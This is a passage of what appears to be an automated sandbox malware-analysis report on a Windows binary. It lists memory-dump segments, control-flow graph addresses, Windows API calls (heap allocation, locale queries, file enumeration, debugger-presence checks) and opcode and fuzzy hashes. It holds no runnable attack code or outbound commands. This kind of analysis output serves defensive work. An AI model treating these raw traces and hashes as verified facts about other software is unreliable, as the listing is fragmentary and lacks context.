                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e9342ec2dfbc5ea8fb8c88a150f31d47631ec56e6382b49cb8f23b86643af154
                                                                                                                                • Instruction ID: d66940b7143305d8ad98979df415f74b12936e9e23edec1d88f1e39516bdf5a3
                                                                                                                                • Opcode Fuzzy Hash: e9342ec2dfbc5ea8fb8c88a150f31d47631ec56e6382b49cb8f23b86643af154
                                                                                                                                • Instruction Fuzzy Hash: AA31647250051AAFCF14DF78D8909EEB7F9BF09324B14526AE512F7690D731EA44CB60

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 269 e93c1b-e93c20 270 e93c6e-e93c74 269->270 271 e93c22-e93c28 call e98773 269->271 273 e93bf9 270->273 274 e93c76 270->274 273->269 276 e93c78-e93c80 274->276 277 e93cc4-e93ccc 274->277 276->277 279 e93cce-e93cd1 277->279 280 e93cf2-e93cfa 277->280 279->280 281 e93cd3-e93cd7 279->281 282 e93cfc-e93d0d call e9c578 280->282 283 e93d0f-e93d1f 280->283 286 e93cd9-e93cdf call e935da 281->286 287 e93d21 281->287 282->283 282->287 285 e93d24-e93d32 call e929c6 283->285 294 e93ce4-e93cf0 286->294 287->285 294->285
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalLeaveSection
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3988221542-0
                                                                                                                                • Opcode ID: 4315a70be37b85533f4f50e40ba676c829045ba515eda8ec8d52975acd5f2763
                                                                                                                                • Instruction ID: c8f321c9d81de4512ee1e972d0fb35b61affe69c6d686105c50ec518541e8037
                                                                                                                                • Opcode Fuzzy Hash: 4315a70be37b85533f4f50e40ba676c829045ba515eda8ec8d52975acd5f2763
                                                                                                                                • Instruction Fuzzy Hash: 71F0243A60865A5ACF259A78A96A7ADFB50FF4633CF74715FD412B90D1CA024A80C220

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 296 e9e531-e9e53d 297 e9e56f-e9e57a call e9ad6d 296->297 298 e9e53f-e9e541 296->298 306 e9e57c-e9e57e 297->306 299 e9e55a-e9e56b RtlAllocateHeap 298->299 300 e9e543-e9e544 298->300 302 e9e56d 299->302 303 e9e546-e9e54d call e9b92d 299->303 300->299 302->306 303->297 308 e9e54f-e9e558 call e98f08 303->308 308->297 308->299
                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00E931E1,00E9186A,?,00E960C1,00E9186C,00E9186A,?,?,?,00E93181,00E931E1,00E9186E,00E9186A,00E9186A,00E9186A), ref: 00E9E563
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                • Opcode ID: a05048e119bbde73d2942272b0e8233f9f5a233965f447091350ec52cb307e17
                                                                                                                                • Instruction ID: ced070c7edf3bde3394554818a6fd4b6905a52d0d3303f175fbf6fb71af84b6f
                                                                                                                                • Opcode Fuzzy Hash: a05048e119bbde73d2942272b0e8233f9f5a233965f447091350ec52cb307e17
                                                                                                                                • Instruction Fuzzy Hash: DAE06531A512255ADF21EA66AC01B6B3688AF41BBCF162121EE55B7391FF61DD0081A1
                                                                                                                                APIs
                                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00EA2B49,00000002,00000000,?,?,?,00EA2B49,?,00000000), ref: 00EA3211
                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00EA2B49,00000002,00000000,?,?,?,00EA2B49,?,00000000), ref: 00EA323A
                                                                                                                                • GetACP.KERNEL32(?,?,00EA2B49,?,00000000), ref: 00EA324F
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale
                                                                                                                                • String ID: ACP$OCP
                                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                                • Opcode ID: a2c6e6ad1242d4d95952a4af16ee3711712f1be8fb93ad954da1d3c15896c457
                                                                                                                                • Instruction ID: 9e73dff67052ddaa2c15ffb928ddb7564af5429e23b0d5e6397cbcbf986473be
                                                                                                                                • Opcode Fuzzy Hash: a2c6e6ad1242d4d95952a4af16ee3711712f1be8fb93ad954da1d3c15896c457
                                                                                                                                • Instruction Fuzzy Hash: D8219232601100AADB348F75D905B9777A6AFAAB58B165525F906FF120E732FF40D360
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
                                                                                                                                  • Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829
                                                                                                                                • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00EA2B1B
                                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00EA2B59
                                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00EA2B6C
                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EA2BB4
                                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EA2BCF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 415426439-0
                                                                                                                                • Opcode ID: bea89e2bf8f154467d668a3560bbabc3d69b3c4d5565f6e0e55361e339b7705f
                                                                                                                                • Instruction ID: 1411a46b7fbef52e07700700b0c6076bf31ee038b601557a128d5dccf85376d3
                                                                                                                                • Opcode Fuzzy Hash: bea89e2bf8f154467d668a3560bbabc3d69b3c4d5565f6e0e55361e339b7705f
                                                                                                                                • Instruction Fuzzy Hash: 27515D71A00216AFDF20DFA9CC41AAE77F8AF1E704F14516DEA10FB150E7B0AA449B61
                                                                                                                                APIs
                                                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA384A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                • Opcode ID: 09cb7d264a95a2ab47ded4e90f50c204f8b89e5baca98c6cae0d43e9a8865549
                                                                                                                                • Instruction ID: f93dd9c85417171ef9bc843fd9a26e710f447fc1e99b4d18feb4b830d34ee675
                                                                                                                                • Opcode Fuzzy Hash: 09cb7d264a95a2ab47ded4e90f50c204f8b89e5baca98c6cae0d43e9a8865549
                                                                                                                                • Instruction Fuzzy Hash: ED71E4B1D051685FDF20DF788C8DAAABBB9AF4A304F1451DAF049BB211DA316F848F10
                                                                                                                                APIs
                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00E9502C
                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00E950F8
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E95111
                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00E9511B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 254469556-0
                                                                                                                                • Opcode ID: d3acd638ff424d0526b9913a4bb61a6b72db8598f56305cda9c1f49b1d423d5a
                                                                                                                                • Instruction ID: e185e9446d4b034aeb0b00a5b322a15f121def24cc144cf9a3e8c8644b8f4629
                                                                                                                                • Opcode Fuzzy Hash: d3acd638ff424d0526b9913a4bb61a6b72db8598f56305cda9c1f49b1d423d5a
                                                                                                                                • Instruction Fuzzy Hash: 163129B5D052199BDF21DFA5D849BCDBBB8AF08304F1051AAE40CAB250EB719B858F44
                                                                                                                                APIs
                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00E959B9
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00E959C8
                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00E959D1
                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00E959DE
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                • Opcode ID: de83eb8ee09a46dc2594a8cf098e4fe7e5cd05499570ff91b4512d6d3f5f6b26
                                                                                                                                • Instruction ID: bfabd1ed7c24e9085aad0a552278d0f794b0b00ed994ddd674bc70c1a680daa9
                                                                                                                                • Opcode Fuzzy Hash: de83eb8ee09a46dc2594a8cf098e4fe7e5cd05499570ff91b4512d6d3f5f6b26
                                                                                                                                • Instruction Fuzzy Hash: 84F0AF30D1120CEFCB00DBB5C94A98EBBF4FF1C200BA14696A412F7110E630AB488F50
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
                                                                                                                                  • Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829
                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EA2D53
                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EA2D9D
                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EA2E63
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoLocale$ErrorLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 661929714-0
                                                                                                                                • Opcode ID: 02a9214e55bc2cab974e0e31b47157bdccd15e0370b8a90781b6737c54b9b7f5
                                                                                                                                • Instruction ID: 323dd3b71e700f10ca5ea538de184b609e98eb650fa5edcbaab26fe71d5a907f
                                                                                                                                • Opcode Fuzzy Hash: 02a9214e55bc2cab974e0e31b47157bdccd15e0370b8a90781b6737c54b9b7f5
                                                                                                                                • Instruction Fuzzy Hash: B1619571A101079FDB25DF28CC82BAA77A8FF19304F10917EEA15FA585E774E980DB50
                                                                                                                                APIs
                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00E931E1), ref: 00E9B5B1
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00E931E1), ref: 00E9B5BB
                                                                                                                                • UnhandledExceptionFilter.KERNEL32(00E91542,?,?,?,?,?,00E931E1), ref: 00E9B5C8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                • Opcode ID: 6bfc450395070ac78ad1f65446b487a5f05083a0abb49ba2060df8503677c786
                                                                                                                                • Instruction ID: 38fd993ce8cb3609f6af2886c2b12a055741439c8b06e8c58a92310fe4bb86af
                                                                                                                                • Opcode Fuzzy Hash: 6bfc450395070ac78ad1f65446b487a5f05083a0abb49ba2060df8503677c786
                                                                                                                                • Instruction Fuzzy Hash: 7A31C6B4901229ABCF21DF64DD89B8DBBB8BF48310F5052DAE41CA6251E7709B858F44
                                                                                                                                APIs
                                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,00EA6E95,?,?,?,?,?,?,00000000), ref: 00EA7167
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionRaise
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3997070919-0
                                                                                                                                • Opcode ID: 6b49a09fe5d06de4d992908fcb42259c40155a1267bd077677a2029a83729726
                                                                                                                                • Instruction ID: 30c06d6a7346b9134e034fc74acfe0f734ce189f6695f718393102ee2f6eaa85
                                                                                                                                • Opcode Fuzzy Hash: 6b49a09fe5d06de4d992908fcb42259c40155a1267bd077677a2029a83729726
                                                                                                                                • Instruction Fuzzy Hash: C2B16F71614608DFD715CF28C886BA57BE0FF4A368F299658E8D9DF2A1C335E981CB40
                                                                                                                                APIs
                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E94CA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2325560087-0
                                                                                                                                • Opcode ID: c2b52d52260fc02f7a83e5a58d7720fa1883b543948ce68d02fd86cc7c6af1ca
                                                                                                                                • Instruction ID: cb31fc26088a5067adbe4bbe1ef252e66f8d4fc251ad916ac416b25b9f9db45c
                                                                                                                                • Opcode Fuzzy Hash: c2b52d52260fc02f7a83e5a58d7720fa1883b543948ce68d02fd86cc7c6af1ca
                                                                                                                                • Instruction Fuzzy Hash: 95A19FB2A11A058FDB19CF55E88279ABBF1FB48314F24A63AD415FB3A0C3349945CF90
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9F807: HeapAlloc.KERNEL32(00000008,?,00E931E1,?,00E9E921,00000001,00000364,00E931E1,00000003,000000FF,?,00E960C1,00E9186C,00E9186A,?,?), ref: 00E9F848
                                                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA384A
                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00EA393E
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00EA397D
                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00EA39B0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475602439.0000000000EBD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_e90000_random.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2701053895-0
                                                                                                                                • Opcode ID: 4cc638422356e14abc3ba933bff1c4b562c727ca5f9e7ebe61d12ecccbe4073e
                                                                                                                                • Instruction ID: 1f8a2996cc9aec50e2d33828332cafc4468804cf4226db9eea73e8271493daa8
                                                                                                                                • Opcode Fuzzy Hash: 4cc638422356e14abc3ba933bff1c4b562c727ca5f9e7ebe61d12ecccbe4073e
                                                                                                                                • Instruction Fuzzy Hash: 4B5149B5900118AFDF14DF788C859BFB7E9DF8A318F14519AF419BB201EA30AE419B60
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00E9E783: GetLastError.KERNEL32(00000000,?,00EA0AB9), ref: 00E9E787
                                                                                                                                  • Part of subcall function 00E9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00E9B9D2), ref: 00E9E829
                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EA3005
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1475418873.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.1475354922.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475462669.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475490521.0000000000EB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475515640.0000000000EB6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475546223.0000000000EB8000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.1475574324.0000000000EBA000.00000002.00000001.01000000.00000003.sdmpDownload File
